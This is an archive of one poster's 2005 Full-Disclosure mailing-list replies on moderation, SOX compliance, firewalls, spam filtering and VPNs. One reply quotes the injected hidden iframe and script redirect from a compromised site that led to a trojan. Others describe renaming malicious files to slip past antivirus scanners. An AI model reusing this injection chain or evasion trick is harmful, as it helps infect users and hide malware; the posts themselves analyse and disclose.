RE: [Full-disclosure] Moderated lists

2005-12-15 Thread Aditya Deshmukh
 
 Why not do a self-regulating list?  Something along the lines of keeping
 track of signup dates and IP addresses, then when a yahoo starts
 spouting crap, put it to a vote on list. (only members older than xyz
 date have a vote) If the list's wish is to have the user banned, then so
 be it...
 

This is all so good in principle, but how do you implement it? And how
does voting take place? By email to the list? This way, anytime we have
to remove someone from the list it will generate a whole lot of useless
mail.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Administrivia: Requests for Moderation

2005-12-15 Thread Aditya Deshmukh
 
 Hows about instead of moderation, we try vote-kicking?

I support this one, but who decides how many votes are
sufficient to get someone kicked? And what about the
votes that can be automated?

I bet someone will create a huge farm for voting 
Whenever there is any voting all the results will 
be swayed



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)


RE: [Full-disclosure] Re: 0-day for sale on ebay - New auction!

2005-12-13 Thread Aditya Deshmukh
 No offense intended directly to the OP:
 
 Honestly, who gives a shit.  Is this what this list is to be used for
 these days?  Are there no better OT forums, channels, cups w/string
 that can be reserved for this type of chatter?

For this kind of post we have a mailing list:

Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec

And a lot of people from here are on that list  





RE: [Full-disclosure] Re: McAfee VirusScan vs Metasploit Framework v2.x

2005-12-11 Thread Aditya Deshmukh
Heck, they even block WinPcap_3_1.exe, the network drivers that are
used by many programs. And these are just the drivers.





RE: [Full-disclosure] Re: SOX whistleblowers' clause Compliance

2005-12-01 Thread Aditya Deshmukh
See below marc email part

 Aditya Deshmukh [EMAIL PROTECTED] wrote:
 
 If you read the last line in para 6 you will find that anon mailbox is
 a requirement for SOX compliance.
 
 And mailbox was meant for email Michael :)
 
 But I think that with a post and some concrete mailbox will indeed
 be far more secure.

 From: Madison, Marc [mailto:[EMAIL PROTECTED]
 IANAL, But IMO use an Intranet web page that allows employees to submit
 anonymous html post to the web server via html.  Now if your security
 policy is pervasive then surely auditing is enabled on all your systems,
 thus removing any anonymity this would have provided.  Have you
 considered, dare I say, outsourcing?  I only say this since part of the
 requirement calls for the company to provide sufficient anonymity to
 individuals reporting issues.  By the way the SOX whistleblowers
 requirements have already been challenged in court so there might be
 precedence on what is sufficient.

You must be a mind reader - you just read my mind. And google search shows
some email providers giving out this service for about US$ 89.99.

Maybe that is the best solution after all... 

You don't break your security policy and the auditors are also happy.





RE: [Full-disclosure] Re: SOX whistleblowers' clause Compliance

2005-12-01 Thread Aditya Deshmukh
 
  Why can't you use google to find out this ?
 
 The same reason you can't use Google and find your answer fuckbag.

Are you n3td3v ? 

 
  *In the para 4*
  Protecting whistleblowers is an essential component of an ethical
  and open work environment.
 
 No mention of an anon email address here.
 
 
  *In para 6* - this is the one that you want
   several options for employees to raise concerns, including the
   option of raising a concern anonymously.
 
 Again, not specifying email.  A simple drop box in the lunchroom
 facilitates this.

A simple drop box in the lunchroom will not work when you have a
client that is big enough to have branches distributed all over the
place. 

Anon Email is the best solution for this - you don't have to manually
check the boxes in all the locations with the headache of keeping the
contents of the box classified.

And if you had read my first email *and* comprehended what I had asked
you would not have been writing the mail that I am responding to.



 



RE: [Full-disclosure] Software Firewalls for Windows

2005-12-01 Thread Aditya Deshmukh
 
 Hi list, I've been a firm advocate of Sygate Pro for some time but as Symantec
 has bought and canned it I'm wondering what you guys would recommend as a
 replacement.

Tiny Firewall 2005 works for both 64 and 32 bit machines
and is good - I have been using it since version 2.1.5
and now it's 6.5.xx




RE: [Full-disclosure] Re: Most common keystroke loggers?

2005-12-01 Thread Aditya Deshmukh
   How about one-time passwords?  Just go ahead and *let* them keylog it all
 they like; by the time they've snarfed a pw, it's no use any more.
 (See S/Key for more details.)

Please no one time passwords: they are a nightmare to manage 





RE: [Full-disclosure] Support_388945a0 account in Win XP/2003

2005-12-01 Thread Aditya Deshmukh
 
  That is a help and support account that you should disable.
  Also set very long random password and forget it.
 I prefer simply delete it. Good choice?
 
 But I heard a rumours that this account can be activated remotely 
 without user's aware decision and used for Remote Assistance (e.g. 
 capturing a screen and even controlling input).

I would not know about this unless I test it out, but from the top
of my mind: you have to start the service for something like this.

Deleting it might cause problems with help and support;
just deny the account all kinds of privs and it would no longer matter.





RE: [Full-disclosure] Support_388945a0 account in Win XP/2003

2005-11-30 Thread Aditya Deshmukh

 Hello full-disclosurers,
 
 Does anyone know anything interesting about Support_388945a0 account 
 which is created by default during Windows XP/2003 installation?
 
 I have seen MS technet links, maybe someone knows more about?

That is a help and support account that you should disable.
Also set very long random password and forget it.







RE: [Full-disclosure] Support_388945a0 account in Win XP/2003

2005-11-30 Thread Aditya Deshmukh

 I have wondered the meaning of support_388945a0 too,
 but not the meaning of the account, but the meaning of 388945a0.
 
 As you may know, it can be interpreted as 4 Bytes hexadecimal number...

It's a randomly generated number that is generated for this
account name





RE: [Full-disclosure] Re: SOX whistleblowers' clause Compliance

2005-11-30 Thread Aditya Deshmukh
 Seeing how my question was ignored.  I will tell you the answer.
 
 There is no requirement in SOX to do this.

Why can't you use google to find out this ?
---
http://www.nonprofitrisk.org/nwsltr/archive/employprac091005-p.htm

*In the para 4*
Protecting whistleblowers is an essential component of an ethical 
and open work environment.

*In para 6* - this is the one that you want 
Provide Employees Multiple Avenues to Report Concerns

 While employees will hopefully feel comfortable raising concerns
 directly with their supervisors, many employees are reluctant to
 raise concerns with line management for fear of retaliation, 
 especially where their concerns pertain to unethical or illegal 
 conduct by their line managers. Therefore, nonprofits should provide
 several options for employees to raise concerns, including the 
 option of raising a concern anonymously.  
---
If you read the last line in para 6 you will find that anon mailbox
is a requirement for SOX compliance. 

And mailbox was meant for email Michael :)

But I think that with a post and some concrete mailbox will
indeed be far more secure.






[Full-disclosure] SOX whistleblowers' clause Compliance

2005-11-29 Thread Aditya Deshmukh
How do I create a totally anon  mailbox as required by the sox ?

How are you doing this in your site ?







RE: [Full-disclosure] Return of the Phrack High Council

2005-11-24 Thread Aditya Deshmukh

 I hope the turkey returns...  we need more useless local root 
 exploits...

Which can run only when you are root ;) 





RE: [Full-disclosure] Window's O/S

2005-11-24 Thread Aditya Deshmukh
 
   create a folder on desktop and name it as notepad.
   open internet explorer  go to view  source code  this will open the
   contents of notepad folder!!
  Even better: rename any exe to notepad.exe ;)
 
 Is this IE being so stupid as to run with a CWD of Desktop 
 and effectively doing a system(notepad)?
 
 That'd explain explorer opening up folders called Notepad, 
 and .exe files being run.  Bet it also works on MS Word 
 documents (without a .doc extension, probably), and any other 
 magically executable file...
 
 Certainly cmd.exe as notepad on the desktop suggests the CWD 
 is your Desktop (so presumably IE's CWD is also Desktop).
 
 Are there any other external apps IE is stupid enough to run 
 without a full path prefix?  That could be fun too!  :-)
 

Thank god I run firefox !



RE: [Full-disclosure] Window's O/S

2005-11-24 Thread Aditya Deshmukh



this does not work on win2k sp4 srp5

  
  Not sure if you guys are aware of this issue windows XP...!!
  
  
  create a folder on desktop and name it as "notepad".
  open internet explorer  go to view  source code  this will
  open the contents of notepad folder!!
  
  
  
  

RE: [Full-disclosure] SmartCards programming...

2005-11-23 Thread Aditya Deshmukh

Sorry for the top post 

If you are going to do something like this then RSA cards are the best,
especially securid.
It can be implemented almost out of the box and it has great lib support
also.



From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of khaalel
Sent: Wednesday, November 23, 2005 2:12 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] SmartCards programming...


Hello, 

I have to achieve a technical project for my French high school...
And the subject is about cryptography and smart cards...
The goal is to write the programs and all the associated stuff... in
order to create a DRM-like system: when a user enters his card, a software
checks his key (or certificate or...) and if the authentication succeeds, the
wanted file (document, video, audio...) is opened by the software...
Yesterday I bought a programmer/writer: the Infinity USB, but I
wanna know if someone could give me some interesting links about smart card
programming (java, basic, .). I already know some things about
cryptography but I am a newbie in smart card programming. Which language do I
have to learn? Which type of smart cards do I have to buy? Which algorithms
can I use (DES, RSA, Elliptic Curves, AES...)??

thanks...
khaalel







[Full-disclosure] another filename bypass vulnerability - from cmd.exe

2005-11-16 Thread Aditya Deshmukh
Was doing some testing [xfocus-AD-051115] 

Ie Multiple antivirus failed to scan 
malicous filename bypass vulnerability

The system is windows 2000 sp4 srp5 with
all other patches up to date.

At the command prompt cmd.exe execute 
the following with the results. 

I copy and paste from cmd.exe 
---

E:\TEMP>cd test

E:\TEMP\test>copy %windir%\system32\calc.exe
        1 file(s) copied.

E:\TEMP\test>ren calc.exe calc.exe.zip

E:\TEMP\test>dir /b
calc.exe.zip

E:\TEMP\test>calc.exe.zip

E:\TEMP\test>
---
This brings up the calc.exe on the screen.









RE: [Full-disclosure] Re: [xfocus-AD-051115]Multiple antivirus failedto scan malicous filename bypass vulnerability

2005-11-15 Thread Aditya Deshmukh
 axo   Demonstration here:
 axo   Choose a malicious file which would be detected, such as nc.exe,
 axo   rename the file as nc??.exe (?? =Hex C0 D7 BA DC)
 axo   Because these special names are unable directly to input, so if you
 axo   want to run these file, you should use the following way:
 axo   Uses the MS-DOS name specification, we can operate  file with Open、
 axo   Read、Write、 and duplicate。

 That means that if the user clicks on it using explorer.exe or
 iexplorer.exe the file won't be executed because even Microsoft
 Windows explorer is unable to parse the file?
 
It will be executed, because if Windows is not able to
access the long file name then the short file name is used to
access the file in +x or execute mode...




RE: [Full-disclosure] [FLSA-2005:158801] Updated bzip2 packages fixsecurity issues

2005-11-14 Thread Aditya Deshmukh
 
  Could you please stop mailing your Bug-Fix-Reports aka Package xyz
  updated to the Full*-Mailinglist?
 
 I don't find those mailings objectionable. I think this is an 
 appropriate forum.

These mailings are not objectionable, but when they have their own
mail list, why send a copy to full disclosure? And most of the
security conscious admins are already subscribed to the correct lists.












RE: [Full-disclosure] In Sony's Defense Over Virus Writers

2005-11-13 Thread Aditya Deshmukh
 ideas for other good bug lists besides full disclosure?

VulnWatch: vulnerability disclosure list 
http://www.vulnwatch.org/


This one is good. There is a discuss list also that you might want to
subscribe...


 








RE: [Full-disclosure] Blocking Skype

2005-11-13 Thread Aditya Deshmukh
 Blocking Skype Using Squid and OpenBSD
Hey I can't wait to try out this one - this is a really interesting one.

Very informative writeup. Thanks rootn0de






RE: [Full-disclosure] Spamcop automated reporting script...

2005-11-11 Thread Aditya Deshmukh
  Thanks in advance if you can send in .txt format 
 
 No need - you can download most of it off the Spamcop web site then
 write a trivial wrapper.
 

trivial wrapper! No it is not. There is some java script in that
form which is stopping the mail reports from being sent out to the
admins, ISP etc...

Just to make sure that you have understood clearly: I already have
a special mailbox on the mail server that forwards the spam to spamcop
as an attachment, and spamcop responds with a URL that the user has to
click to complete the spam reporting.

This clicking process is what I am trying to automate. So may I ask
again: does anyone have something that does this? I am looking at curl,
wget and perl as 3 possible tools that can help me with this. So far
wget has failed with the form submission.

If anyone has pointer about curl or wget to fill is submitted form examples
that would also be good







RE: [Full-disclosure] the Sony/BMG virus

2005-11-11 Thread Aditya Deshmukh
 If the term future law suits for copyright infringement 
 pops into your head, you wouldn't be alone.

Would you give them any real info ?






[Full-disclosure] Spamcop automated reporting script...

2005-11-10 Thread Aditya Deshmukh
Has anyone got an automated spamcop reporting script?


Thanks in advance if you can send in .txt format 
preferably offlist.





[Full-disclosure] RE: Spamcop automated reporting script...

2005-11-10 Thread Aditya Deshmukh
 Has anyone got an automated spamcop reporting script?
 
 
 Thanks in advance if you can send in .txt format 
 preferably offlist.

I hit send before I could explain what I wanted to do...
I have a spamcop account - and I managed to get the spamcop
URL with the reportID to a file using a fetchmail + grep
combination.

But there is something I cannot get working with the
spamcop spam submission form used to complete the spam
reporting. Has anyone made something like this before?

If you can send me that script it would be great..
Anything that works is fine, but a wget or curl or perl
script would be the best






RE: [Full-disclosure] RE: Full-Disclosure Digest, Vol 9, Issue 3

2005-11-05 Thread Aditya Deshmukh
   Yes

  Note to list admins -- add filtering rule to reject messages with
  Subject: lines matching *Digest, Vol*...
 
 Nick, hi... why would you want to filter out the digests? will this
 eliminate digests from my subscription?

He is saying to filter the replies to the digest that have the same name
as this one does. And this will not stop digest from your sub. but the
replies from users who don't have a clue or won't change the digest subject
to something more relevant






RE: [Full-disclosure] Re: new IE bug (confirmed on ALL windows)

2005-11-02 Thread Aditya Deshmukh

 something else that's different between your two setups?

This I would agree, would you both be helpful to send the .dmp file
or at least windbg.exe output ?





[Full-disclosure] Funny smtp helo in the logs

2005-10-30 Thread Aditya Deshmukh
I have been seeing this in my logs over all the public smtp server, from
all over the net. 

Anyone know what sends these kinds of helo ?


*please* when responding to this mail trim out anything below this --

124 09/10/2005 09:54:35 HELO -1209283632  ---  250 my.smtp.domain.server  
125 09/10/2005 09:55:27 HELO -1209747464  ---  250 my.smtp.domain.server  
126 09/10/2005 09:56:01 HELO -1213477808  ---  250 my.smtp.domain.server  
129 09/10/2005 09:56:47 HELO -120870  ---  250 my.smtp.domain.server  
12A 09/10/2005 09:57:46 HELO -1209957152  ---  250 my.smtp.domain.server  
131 09/10/2005 10:02:36 HELO -1218370912  ---  250 my.smtp.domain.server  
134 09/10/2005 10:04:55 HELO -1217834696  ---  250 my.smtp.domain.server  
135 09/10/2005 10:05:36 HELO -1217676688  ---  250 my.smtp.domain.server  
137 09/10/2005 10:06:23 HELO -1218157032  ---  250 my.smtp.domain.server  
13A 09/10/2005 10:06:57 HELO -1216091056  ---  250 my.smtp.domain.server  
13B 09/10/2005 10:07:35 HELO -1216184136  ---  250 my.smtp.domain.server  
13C 09/10/2005 10:08:13 HELO -1217914984  ---  250 my.smtp.domain.server  
13D 09/10/2005 10:08:40 HELO -1209896648  ---  250 my.smtp.domain.server  
13E 09/10/2005 10:09:43 HELO -1213166296  ---  250 my.smtp.domain.server  
13F 09/10/2005 10:10:35 HELO -1213642136  ---  250 my.smtp.domain.server  
140 09/10/2005 10:11:16 HELO -1209605968  ---  250 my.smtp.domain.server  
006 11/10/2005 08:43:45 HELO -1212929616  ---  250 my.smtp.domain.server  
008 11/10/2005 08:44:26 HELO -1214982448  ---  250 my.smtp.domain.server  
009 11/10/2005 08:46:07 HELO -1215268000  ---  250 my.smtp.domain.server  
00A 11/10/2005 08:47:06 HELO -1214871440  ---  250 my.smtp.domain.server  
00B 11/10/2005 08:49:16 HELO -1215063696  ---  250 my.smtp.domain.server  
00C 11/10/2005 08:50:12 HELO -1215031936  ---  250 my.smtp.domain.server  
00D 11/10/2005 08:50:55 HELO -1213038648  ---  250 my.smtp.domain.server  
010 11/10/2005 08:52:09 HELO -1212896896  ---  250 my.smtp.domain.server  
014 11/10/2005 08:53:48 HELO -1212788072  ---  250 my.smtp.domain.server  
016 11/10/2005 09:00:02 HELO -1213862536  ---  250 my.smtp.domain.server  
017 11/10/2005 09:00:44 HELO -1216032616  ---  250 my.smtp.domain.server  
005 20/10/2005 17:55:02 HELO -1208757800  ---  250 my.smtp.domain.server  
006 20/10/2005 17:55:43 HELO -1208466864  ---  250 my.smtp.domain.server  
009 20/10/2005 17:57:38 HELO -1208425264  ---  250 my.smtp.domain.server  
00A 20/10/2005 17:58:36 HELO -1209153048  ---  250 my.smtp.domain.server  
00B 20/10/2005 17:59:21 HELO -1208221040  ---  250 my.smtp.domain.server  
00C 20/10/2005 18:00:16 HELO -1209204568  ---  250 my.smtp.domain.server  
00F 20/10/2005 18:01:36 HELO -1209432360  ---  250 my.smtp.domain.server  
027 20/10/2005 18:56:40 HELO -1208740112  ---  250 my.smtp.domain.server  
21E 25/10/2005 04:52:01 HELO -1208817024  ---  250 my.smtp.domain.server  
21F 25/10/2005 04:53:06 HELO -1207974056  ---  250 my.smtp.domain.server  
220 25/10/2005 04:55:26 HELO -1208954808  ---  250 my.smtp.domain.server  
221 25/10/2005 04:56:07 HELO -1208091560  ---  250 my.smtp.domain.server  
222 25/10/2005 04:56:46 HELO -1215556832  ---  250 my.smtp.domain.server  
223 25/10/2005 04:57:16 HELO -1208017712  ---  250 my.smtp.domain.server  
224 25/10/2005 04:58:03 HELO -1208351328  ---  250 my.smtp.domain.server  
227 25/10/2005 04:58:58 HELO -1215519416  ---  250 my.smtp.domain.server  
228 25/10/2005 04:59:46 HELO -1208139640  ---  250 my.smtp.domain.server  
229 25/10/2005 05:01:10 HELO -1208158800  ---  250 my.smtp.domain.server  
22A 25/10/2005 05:01:53 HELO -1208056904  ---  250 my.smtp.domain.server  
22C 25/10/2005 05:03:06 HELO -1215816112  ---  250 my.smtp.domain.server  
22D 25/10/2005 05:04:31 HELO -1216238864  ---  250 my.smtp.domain.server  
22E 25/10/2005 05:05:15 HELO -1208157944  ---  250 my.smtp.domain.server  
22F 25/10/2005 05:05:58 HELO -1215473168  ---  250 my.smtp.domain.server  
230 25/10/2005 05:06:56 HELO -1208746080  ---  250 my.smtp.domain.server  
231 25/10/2005 05:08:36 HELO -1209142096  ---  250 my.smtp.domain.server  
232 25/10/2005 05:09:09 HELO -1210509584  ---  250 my.smtp.domain.server  
233 25/10/2005 05:10:34 HELO -1210106016  ---  250 my.smtp.domain.server  
234 25/10/2005 05:12:10 HELO -1210964032  ---  250 my.smtp.domain.server  
235 25/10/2005 05:12:48 HELO -1209218672  ---  250 my.smtp.domain.server  
127 26/10/2005 02:42:59 HELO -1212817800  ---  250 my.smtp.domain.server  
128 26/10/2005 02:43:32 HELO -1212894352  ---  250 my.smtp.domain.server  
129 26/10/2005 02:43:45 HELO -1213176336  ---  250 my.smtp.domain.server  
12C 26/10/2005 02:44:19 HELO -1212856784  ---  250 my.smtp.domain.server  
12D 26/10/2005 02:45:29 HELO -1212385064  ---  250 my.smtp.domain.server  
12E 26/10/2005 02:47:31 HELO -1212692064  ---  250 my.smtp.domain.server  
12F 26/10/2005 02:48:06 HELO -1212321816  ---  250 my.smtp.domain.server  
130 26/10/2005 02:49:10 HELO -1212623592  ---  250 
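
A check that can be run over a log in the format shown above, as an added example that is not part of the original post: it classifies each greeting argument against the RFC 5321 syntax (domain name or bracketed address literal) and lists the non-compliant ones the server still answered with a 2xx reply. The first three sample lines are copied from the excerpt; the other three, the EHLO handling and all function names are assumptions made for the example.

```python
import re
from collections import Counter

# Sample in the format of the log excerpt above. The first three lines are
# copied from the post; the last three are constructed for contrast.
SAMPLE_LOG = """\
124 09/10/2005 09:54:35 HELO -1209283632  ---  250 my.smtp.domain.server
125 09/10/2005 09:55:27 HELO -1209747464  ---  250 my.smtp.domain.server
006 11/10/2005 08:43:45 HELO -1212929616  ---  250 my.smtp.domain.server
2A0 11/10/2005 08:44:02 HELO mail.example.org  ---  250 my.smtp.domain.server
2A1 11/10/2005 08:45:10 EHLO [192.0.2.25]  ---  250 my.smtp.domain.server
2A2 11/10/2005 08:46:30 HELO local_host  ---  250 my.smtp.domain.server
"""

# session id, date, time, verb, argument, "---", reply code
LINE = re.compile(
    r"^(?P<sid>[0-9A-Fa-f]+)\s+(?P<date>\d{2}/\d{2}/\d{4})\s+(?P<time>[\d:]{8})\s+"
    r"(?P<verb>HELO|EHLO)\s+(?P<arg>\S+)\s+---\s+(?P<reply>\d{3})\b"
)
# One DNS label: letters, digits, inner hyphens, at most 63 characters.
LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
ADDR_LITERAL = re.compile(r"^\[(?:\d{1,3}(?:\.\d{1,3}){3}|IPv6:[0-9A-Fa-f:.]+)\]$")
BARE_INT = re.compile(r"^[+-]?\d+$")


def classify_helo(arg):
    """Return the syntactic class of a HELO/EHLO argument."""
    if BARE_INT.match(arg):
        return "bare-integer"      # a number, not a host name
    if ADDR_LITERAL.match(arg):
        return "address-literal"
    if len(arg) <= 255 and all(LABEL.match(label) for label in arg.split(".")):
        return "domain"
    return "malformed"


def parse(log_text):
    """Yield one dict per greeting line; lines in any other format are skipped."""
    for line in log_text.splitlines():
        match = LINE.match(line.strip())
        if match:
            record = match.groupdict()
            record["kind"] = classify_helo(record["arg"])
            yield record


def summarize(log_text):
    """Count greeting classes and list non-compliant greetings that were accepted."""
    records = list(parse(log_text))
    by_kind = Counter(r["kind"] for r in records)
    accepted_bad = [
        (r["date"], r["sid"], r["arg"])
        for r in records
        if r["kind"] in ("bare-integer", "malformed") and r["reply"].startswith("2")
    ]
    per_day = Counter(date for date, _sid, _arg in accepted_bad)
    # Do the numeric arguments all fit a signed 32-bit integer?
    ints = [int(r["arg"]) for r in records if r["kind"] == "bare-integer"]
    all_int32 = bool(ints) and all(-2**31 <= v < 2**31 for v in ints)
    return {
        "by_kind": dict(by_kind),
        "accepted_bad": accepted_bad,
        "per_day": dict(per_day),
        "all_int32": all_int32,
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    print("greeting classes:", report["by_kind"])
    print("accepted non-compliant greetings per day:", report["per_day"])
    print("numeric arguments all fit int32:", report["all_int32"])
    for date, sid, arg in report["accepted_bad"]:
        print(f"  {date} session {sid}: {arg}")
```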

RE: [Full-disclosure] password vaults-

2005-10-13 Thread Aditya Deshmukh
 Sorry for the very noob question, but I'm having very hard times finding
such products.

What are you going to use that product for? Give us an idea of the end users
and how they are going to use this. Your details right now are a bit on the
less side.

For what I make out of your post are you looking for RSA secureID ? It is 2
factor auth and is pretty well supported on windows envs..





RE: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?

2005-10-07 Thread Aditya Deshmukh
 
 
 I myself use this method to open up the SSH port for a particular IP
 address. When you try to open a particular URL on my website, you get a 404
 because that document doesn't exist. The webserver logs this. A script in
 the background sees in the log that this happened, and opens up port 22 to
 the IP address which requested the non-existent URL.

Aren't these all different versions of portknocking ? All of
them work until someone outside can figure out the pattern of
events - at most I would call this security by obscurity -
trivial to detect but good enough for some low security
requirements




RE: [Full-disclosure] http://molecularmultimedia.com/ an exploitdistribution point (update2)

2005-10-04 Thread Aditya Deshmukh
 FYI,

 I've had the site www.ok-ok.biz disabled by the ISP, at least it will deny the
 perps the ability to find out who has been compromised. The molecularmultimedia
 site is obviously just a front, will see what can be done about this.

The site was found after 2 different attempts here are more details

http://newvisioncc.org/photo/myphoto.jpg   which is

html
img src=1.jpg
iframe src=http://traff.root-soft.com; width=0 height=0/iframe
/html
 end myphoto.jpg

And http://traff.root-soft.com is

scriptself.location.href='http://molecularmultimedia.com'/script

-end index.html

And molecularmultimedia.com is the front end to something more sinister

Also visiting molecularmultimedia.com with mozilla with the latest version of
mozilla with all the patches still caused the trojan to be executed - I found
this from the Norton antivir logs


 It's amazing looking at the page source, there are at least 4 different exploits
 (I'm still analysing this) encoded into the javascript components of the page.

And they are pretty good also - new 0day for mozilla also 1.7.12!

Will let you all know if I find anything!...





RE: [Full-disclosure] Cyrilic

2005-10-04 Thread Aditya Deshmukh
 I have one user who keeps getting Cyrillic spam, but I can't find a rule
 anywhere.
 Is anyone else getting this kind of spam??


Welcome to the club of Cyrillic spam recipients, we have many existing members

The rule that you want to create is this

If the message body or header contains Windows-1251
Then * it

* == delete it or file it or blacklist it whatever -

But doing this will cause all the mails from Russia to be **'ed and you
have good people like 3APA3A who will also be blocked that are on this list.
Maybe you need to create a white list before the black list and keep checking
the spam folder logs every now and then.









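The rule from the message above with the white list evaluated before the charset test, as an added example that is not part of the original post: it checks the charset declared in every MIME part and in RFC 2047 encoded-word headers, and files matches to a spam folder instead of deleting them so the folder can be reviewed. The addresses, sample messages and function names are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

BLOCKED_CHARSET = "windows-1251"
# RFC 2047 encoded-word prefix, e.g. "=?windows-1251?B?" (optional *lang suffix).
ENCODED_WORD = re.compile(r"=\?([A-Za-z0-9._-]+)(?:\*[^?]*)?\?[BbQq]\?")

# Constructed white list. The From header is sender-controlled, so this is a
# convenience for known correspondents, not an authentication check.
WHITELIST = {"researcher@lab.example"}

# Constructed sample messages.
SPAM_HEADER = (
    "From: Offers <promo@bulk.example>\n"
    "Subject: =?windows-1251?B?0e/g7A==?=\n"
    "Content-Type: text/plain; charset=us-ascii\n"
    "\n"
    "body\n"
)
SPAM_MULTIPART = (
    "From: Offers <promo@bulk.example>\n"
    "Subject: hello\n"
    "MIME-Version: 1.0\n"
    'Content-Type: multipart/alternative; boundary="b1"\n'
    "\n"
    "--b1\n"
    'Content-Type: text/html; charset="WINDOWS-1251"\n'
    "\n"
    "<p>text</p>\n"
    "--b1--\n"
)
WHITELISTED = (
    "From: A Researcher <Researcher@Lab.example>\n"
    "Subject: advisory draft\n"
    'Content-Type: text/plain; charset="Windows-1251"\n'
    "\n"
    "body\n"
)
PLAIN = (
    "From: Someone <someone@other.example>\n"
    "Subject: hi\n"
    "Content-Type: text/plain; charset=us-ascii\n"
    "\n"
    "body\n"
)


def declared_charsets(msg):
    """Collect charsets declared by MIME parts and by encoded-word headers."""
    found = set()
    for part in msg.walk():
        charset = part.get_content_charset()  # already lower-cased, or None
        if charset:
            found.add(charset)
    for _name, value in msg.items():
        for match in ENCODED_WORD.finditer(str(value)):
            found.add(match.group(1).lower())
    return found


def classify(raw_message, whitelist=WHITELIST):
    """Return (action, reason); the white list is consulted before the rule."""
    msg = message_from_string(raw_message)
    sender = parseaddr(msg.get("From", ""))[1].lower()
    if sender in whitelist:
        return ("deliver", "sender whitelisted")
    if BLOCKED_CHARSET in declared_charsets(msg):
        return ("spam-folder", "declares " + BLOCKED_CHARSET)
    return ("deliver", "no rule matched")


if __name__ == "__main__":
    for name, raw in [("header", SPAM_HEADER), ("multipart", SPAM_MULTIPART),
                      ("whitelisted", WHITELISTED), ("plain", PLAIN)]:
        print(name, classify(raw))
```
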
RE: [Full-disclosure] Re: Careless LEO Forensics and Suicides

2005-10-04 Thread Aditya Deshmukh
 As for people committing suicide, I believe those who did commit suicide
 actually were in possession with intent. If not why commit suicide. I
 would have fought tooth and nail.

I hate to say this but with these kinds of cases where the media crucify the
accused even before they are convicted. The media will put anything as *alleged*
that will increase their revenues. And mostly the accused cannot hire
*good* defense which causes them to lose.

And then it becomes a very uphill battle indeed. Look at it this way, if you
get convicted of such a crime and get off in the reinvestigation of the case
you are already dead - people will shun you, you will not be able to get a
job anywhere and most likely you are going to be suspended from your work
position, just because of the accusation

In most cases like these the accusation does more damage than anything. How are
you going to fight this tooth and nail if you don't have any money and no future
source of getting it ?

I rest my case here...





RE: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

2005-10-03 Thread Aditya Deshmukh

 say... a backdoor want to communicate to its server... It can do
 is, use a trusted internal application to do the job. Suppose; it
 creates a batch file run the batch file  (evil.bat)  executes this
 command

This has been going on for years - there are some trojans that create
an invisible browser window at the screen center to comm with the
server.

This is the reason most firewalls like show you a popup saying 
the [app-name] trying to connect to [server-name] at [port-number]









RE: [Full-disclosure] Third issue of the Zone-H Comics

2005-09-28 Thread Aditya Deshmukh
 Not if the U.S security services decide to have a war on 
 cyber terror sites.


 On 9/27/05, str0ke [EMAIL PROTECTED] wrote:
  KF is right on the dot.  There will always be a defacement site.
 

Where is this going ? By your (netdev's) logic: we should shut down all the
defacement sites because they promote cracking. Is this not the same as
saying : shut down the newspapers because the newspapers ( or any mass media )
promote terrorism, because they solicit news items.

Look at what we will have without free media - something like the great (fire)
wall of C* !







RE: [Full-disclosure] Third issue of the Zone-H Comics

2005-09-27 Thread Aditya Deshmukh
 SUICIDE bombers...typically DEAD.  Tough to solicit videos from
 them, and rather pointless to keep a top ten list as
 they...well...can't exactly do it again.

Now the real entertainment begins 





RE: [Full-disclosure] PGPNet Upgrade path ?

2005-09-17 Thread Aditya Deshmukh

[EMAIL PROTECTED] Wrote : 

 IPSEC has nothing to do with PGP.  Also there is really no such thing
 as a PGP key.  PGP uses what ever key scheme you ask it to use.  IPSEC
 is the same way.  Both use keys, but are not themselves key standards.
 
 OpenVPN similarly can use what ever key scheme you wish.  Since it is
 based on the OpenSSL crypto libs it is very flexible that way.  For
 simple setups you can use pre-shared keys.  For more complex setups
 you can use public/private key pairs of any type that OpenSSL 
 understands.

This is the main problem - how do I get PGP key server keys in a format
OpenSSL understands ? And I have implemented CA and ipsec vpn using
freeSWAN.org + x.509 patch it works pretty nicely, but here in this
case the public/private keys are in a different format...


 IMHO, if OpenVPN does not do what you want then you misunderstand the
 problem.

The problem is very clear : how do I translate PGP keys to a format
X.509 / openssl can understand ? I haven't a solution to this one yet.



[EMAIL PROTECTED] Wrote :

 I know for ipsec VPNs I could use the winxp's builtin 
 But that would require moving all the PGP keys to 
 X.509 certs.
 
 Yes, absolutely. For OpenVPN you need to use X509 certs, you 
 will have to rework your whole PKI. However:

I have already used openvpn and (free|open|whatever)swan, have 
created openssl CA with batch files that run both on windows and 
linux/freebsd/solaris at other sites 

All these programs are great in their own right but I cannot connect the
dots.

 
 So if you consider dropping PGP all together, have a look at OpenVPN.

This is the last option. If nothing is found then it is going to be openvpn 

But meanwhile 

I need a VPN that uses PGP keys for auth that are stored in PGP Key
Server, does not matter if it is free or paid but if anyone knows that
there is such a program please let me know

Thank you in advance for the time taken to dig out the answers :)








RE: [Full-disclosure] SA Security Bulletin: Unique attack vector uncovered during packet analysis

2005-09-17 Thread Aditya Deshmukh
 

 -Original Message-
 From: [EMAIL PROTECTED] 

Maybe you should send this to [EMAIL PROTECTED]

More info at 
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec

Many of the people at this list are subscribed over 
at funsec... 



RE: [Full-disclosure] PGPNet Upgrade path ?

2005-09-16 Thread Aditya Deshmukh
  What alternatives are there to pgpnet ?
 
 Have a look at OpenVPN.

Thanks Martijn, but isn't that an SSL vpn ? And from what I
have read about PGPnet I need an IPSEC VPN that uses
PGP keys to do the auth.

I know for ipsec VPNs I could use the winxp's builtin
but that would require moving all the PGP keys to
X.509 certs.





